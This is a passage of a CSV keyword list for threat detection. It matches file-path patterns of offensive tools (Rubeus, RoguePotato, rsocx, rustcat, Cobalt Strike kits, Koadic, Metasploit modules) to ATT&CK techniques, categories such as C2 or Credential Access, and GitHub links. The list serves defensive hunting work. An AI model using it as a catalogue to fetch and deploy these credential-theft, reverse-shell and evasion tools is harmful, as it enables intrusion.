auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rmi-dumpregistry.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rmi-vuln-classloader.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ROADtools/*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*/rockyou.txt*","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with Hashcat","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rockyou.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/rockyou.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/RoguePotato.git*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*/RogueWinRMdll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/RogueWinRMexe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/root/.mozilla/firefox/*.Exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/root/output/ratchatPT*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*/root/shellcode.c*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*/root/shellcode.cpp*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*/root/shellcode.exe*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*/root/viper/*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/root/viper/dist*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/rop_emporium*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*/ropbuffers.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*/ropfuscator*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" +"*/rottenpotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/rpcap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rpcap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rpcbomb.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/rpc-grind.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rpcinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rpcrt.py *","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","0","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" +"*/rpivot.git*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" +"*/rsa-vuln-roca.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rservices_from_users.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/rsocx-*-linux-x86-64.zip*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*/rsocx-*-windows-x86-64.zip*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*/rsocx.exe*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*/rsocx.git*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*/rsync-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rsync-list-modules.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rtsp-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rtsp-url-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Rubeus*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*/Rubeus/*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*/Rudrastra.git*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" +"*/rulerforms.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*/run/leet.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/run_as_psh.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/RunasCs.cs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*/RunasCs.git*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*/RunasCs.git*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*/RunasCs.zip*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*/runasppl.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/RunAsWinTcb.git*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*/RunAsWinTcb.iml*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*/runcalc.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/rundll32.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/rundll32_js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/RunOF/RunOF/*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*/runshellcode.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*/RuralBishop.git*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" +"*/rusers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rustcat/releases/latest/download/*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*/rusthound.exe*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*/RustHound.git*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"*/rvrsh3ll/*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*/RWXfinder.git*","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - 